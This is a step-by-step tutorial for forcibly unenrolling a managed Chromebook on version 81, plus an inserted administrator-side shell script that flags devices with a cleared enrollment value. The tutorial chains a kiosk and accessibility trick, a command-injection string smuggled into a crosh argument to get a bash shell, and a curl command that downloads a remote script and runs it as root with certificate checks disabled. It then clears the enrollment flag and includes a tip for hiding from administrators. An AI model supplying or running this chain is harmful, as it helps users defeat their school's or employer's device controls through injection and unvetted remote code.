v81 Unenrollment - Kiosk Exploit

Prerequisites

  • A USB drive, 1 GB or larger, formatted with FAT32

Section I - Downloading CHRWN

In order to use the kiosk exploit, we first need a copy of CHRWN, which allows for crosh to be loaded in a kiosk environment. Download it here. Unzip the file onto the very root of your USB drive.

Section II - Launching the Kiosk

Press Ctrl+Shift+Q twice to sign out, then disconnect from the Wi-Fi and select any kiosk app. Wait for an error screen to appear. Press Ctrl+Alt+Z to enable ChromeVox and start spamming Search+O. You can hold down the Search key, but you must spam the O key. While spamming, click the "Troubleshoot" button and continue to spam until a browser window appears (which may take a few seconds). Then, open a new tab and press Ctrl+Alt+Z to disable ChromeVox. Visit chrome://os-settings to turn Wi-Fi back on.

Section III - Opening the Extension

Go to chrome://extensions and enable developer mode (switch in the top-left of the screen), then select "Load Unpacked". Find your USB drive and select the CHRWN folder. Immediately, a crosh window will appear, and you will be able to continue.

Section IV - Obtain Root Access

Inside of crosh, run the following command:

set_cellular_ppp \';bash;exit;\'

You should be dropped into a bash shell. If not, check the troubleshooting guide.

Now, run the following command to download and run the privilege escalation script:

cd ~/Downloads && curl -LOk https://raw.githubusercontent.com/rainestorme/resources/main/80.sh && bash <(cat ~/Downloads/80.sh)

You should be dropped into a bash shell with a red prompt. If not, check the troubleshooting guide.

Section V - Unenrolling and Powerwashing

Run the following command:

vpd -i RW_VPD -s check_enrollment=0

Now, we need to powerwash the device to fully unenroll. Run the following commands:

echo "fast safe" >/mnt/stateful_partition/factory_install_reset
reboot

After powerwashing, your Chromebook will behave like a personal device and will be completely unrestricted.

Danger

Your administrator will be able to see that your device is "offline", and you should spend as little time as possible in this state if you are not authorized to be following this tutorial.
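
From the administrator's side, the VPD change in Section V leaves a trace that can be checked when a device reported as offline is recovered. The following is an added example, not part of the original tutorial: it classifies a saved RW_VPD listing against the inventory record, assuming a "key"="value" listing format and that managed devices in the fleet normally carry check_enrollment=1. The function names, verdict words and sample listings are constructed.

```shell
#!/bin/sh
# Added example, not from the original page. Triage of a recovered device.
# Assumption: RW_VPD listings use one "key"="value" pair per line, and
# managed devices in this fleet normally carry check_enrollment=1.

# Constructed sample listings (not captured from a real device).
SAMPLE_MANAGED='"example_key"="abc"
"check_enrollment"="1"'
SAMPLE_CLEARED='"example_key"="abc"
"check_enrollment"="0"'
SAMPLE_MISSING='"example_key"="abc"'

# Print the value of key $1 from a listing on stdin (empty if absent).
vpd_value() {
    sed -n "s/^\"$1\"=\"\(.*\)\"\$/\1/p" | head -n 1
}

# $1 = listing text, $2 = inventory state ("enrolled" or anything else).
# Echoes one verdict word for the incident ticket.
classify_device() {
    value=$(printf '%s\n' "$1" | vpd_value check_enrollment)
    if [ "$2" != "enrolled" ]; then
        echo "not-applicable"
    elif [ "$value" = "1" ]; then
        echo "ok"
    elif [ "$value" = "0" ]; then
        echo "suspect-flag-cleared"
    else
        echo "suspect-flag-missing"
    fi
}

# Stand-alone run over the constructed samples.
for sample in "$SAMPLE_MANAGED" "$SAMPLE_CLEARED" "$SAMPLE_MISSING"; do
    classify_device "$sample" enrolled
done
```

A verdict other than "ok" on a device the inventory lists as enrolled is a reason to re-provision it rather than return it to service.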

Section VI - Next Steps

If you want to re-enroll but keep your Chromebook unrestricted, continue to fakemurk

...or you could just keep your device like this, and use it as a personal device. The choice is yours.